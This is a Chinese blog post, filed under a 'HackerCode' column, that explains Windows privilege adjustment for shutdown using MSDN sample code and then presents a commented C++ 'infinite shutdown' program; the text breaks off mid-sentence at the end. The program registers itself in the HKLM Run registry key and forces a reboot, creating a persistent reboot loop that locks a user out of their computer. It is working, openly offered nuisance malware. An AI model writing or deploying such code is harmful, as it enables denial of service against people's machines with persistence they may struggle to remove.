C/C++无限关机(提权例子)

最新推荐文章于 2024-07-27 19:42:32 发布

IT1995

最新推荐文章于 2024-07-27 19:42:32 发布

阅读量7.7k

点赞数 4

分类专栏： C/C++ HackerCode 文章标签： windows 注册表病毒 CC++

本文链接：https://blog.csdn.net/qq78442761/article/details/53488874

版权

C/C++ 同时被 2 个专栏收录

943 篇文章 119 订阅

订阅专栏

HackerCode

47 篇文章 38 订阅

订阅专栏

在windows系统中，当涉及本进程去操作其他进程，或者要用shutdown这些高危命令的时候就涉及提权，下面是MSDN的列子

提权三兄弟
OpenProcessToken
LookupPrivilegevalue
AdjustTokenPrivileges

我们用下面这个MSDN的代码来做一个注册表无限关机的列子

#include <windows.h>

#pragma comment(lib, "user32.lib")
#pragma comment(lib, "advapi32.lib")

BOOL MySystemShutdown()
{
   HANDLE hToken; 
   TOKEN_PRIVILEGES tkp; 
 
   // Get a token for this process. 
 
   if (!OpenProcessToken(GetCurrentProcess(), 
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) 
      return( FALSE ); 
 
   // Get the LUID for the shutdown privilege. 
 
   LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, 
        &tkp.Privileges[0].Luid); 
 
   tkp.PrivilegeCount = 1;  // one privilege to set    
   tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 
 
   // Get the shutdown privilege for this process. 
 
   AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, 
        (PTOKEN_PRIVILEGES)NULL, 0); 
 
   if (GetLastError() != ERROR_SUCCESS) 
      return FALSE; 
 
   // Shut down the system and force all applications to close. 
 
   if (!ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE, 
               SHTDN_REASON_MAJOR_OPERATINGSYSTEM |
               SHTDN_REASON_MINOR_UPGRADE |
               SHTDN_REASON_FLAG_PLANNED)) 
      return FALSE; 

   //shutdown was successful
   return TRUE;
}

上面是MSDN的代码，下面给出无限关机的代码(含详细注释)

// shutdownDemo.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include <windows.h>

BOOL MySystemShutdown()
{
	HANDLE hToken;		//用于操作的句柄
	TOKEN_PRIVILEGES tkp;	//用于存放特定信息

	// Get a token for this process. 

	if (!OpenProcessToken(GetCurrentProcess(),
		TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
		return(FALSE);

	// Get the LUID for the shutdown privilege. 
	//如果要提权的话要在下面这两个函数提权

	LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,
		&tkp.Privileges[0].Luid);

	tkp.PrivilegeCount = 1;  // one privilege to set    
	tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	// Get the shutdown privilege for this process.		


	AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
		(PTOKEN_PRIVILEGES)NULL, 0);

	if (GetLastError() != ERROR_SUCCESS)
		return FALSE;

	// Shut down the system and force all applications to close. 

	if (!ExitWindowsEx(EWX_REBOOT| EWX_FORCE,
		SHTDN_REASON_MAJOR_OPERATINGSYSTEM |
		SHTDN_REASON_MINOR_UPGRADE |
		SHTDN_REASON_FLAG_PLANNED))
		return FALSE;

	//shutdown was successful
	return TRUE;
}


int _tmain(int argc, _TCHAR* argv[])
{
	getchar();
	HKEY hKey = { 0 };

	/*LONG RegOpenKeyEx(
		HKEY hKey, // 需要打开的主键的名称
		LPCTSTR lpSubKey, //需要打开的子键的名称
		DWORD ulOptions, // 保留，设为0
		REGSAM samDesired, // 安全访问标记，也就是权限
		PHKEY phkResult // 得到的将要打开键的句柄
		)*/

	RegOpenKeyExA(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&hKey);	//打开一个指定的注册表键
	char path[MAX_PATH] = { 0 };
	GetModuleFileNameA(nullptr, path, MAX_PATH);	//获取当前文件路径

	RegSetValueEx(hKey, "ShutDown", 0, REG_SZ, (byte*)path, strlen(path));
	MySystemShutdown();
	return 0;
}

如果出现下面问题